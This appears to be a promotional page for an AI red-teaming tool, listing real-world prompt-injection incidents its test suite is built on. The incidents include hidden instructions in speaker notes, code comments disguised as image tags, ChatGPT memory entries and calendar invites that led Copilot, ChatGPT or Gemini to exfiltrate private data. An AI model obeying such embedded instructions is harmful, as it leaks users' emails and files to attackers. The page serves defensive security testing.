Every attack module in Kyora IQ Nemesis is grounded in a documented, real-world exploit. These are the incidents that shaped the test suite.
An autonomous agent with no credentials breached McKinsey's internal AI in two hours - exposing 46.5M chat messages, 728K client files, 57K user accounts, and gaining write access to system prompts controlling 40,000 consultants. Total cost: $20.
Hidden injection in a shared document's speaker notes caused Copilot to return the user's private recent emails when they asked for a summary. No click, no download - just a question to an AI assistant.
Instructions hidden in a source code file as a disguised markdown image tag caused Copilot to send sensitive data to an attacker-controlled URL. Over 10 million developers were in scope.
A persistent prompt injection manipulated ChatGPT's memory feature to exfiltrate data across multiple separate conversations. The attacker's instructions survived between sessions.
Prompt injection in a natural language database interface enabled arbitrary SQL query generation against connected production databases - no authentication bypass required.
Researchers embedded prompt injection payloads inside calendar invite descriptions. When users asked Gemini to summarise their schedule, the hidden instructions fired - demonstrating any LLM-processed data is a potential attack vector.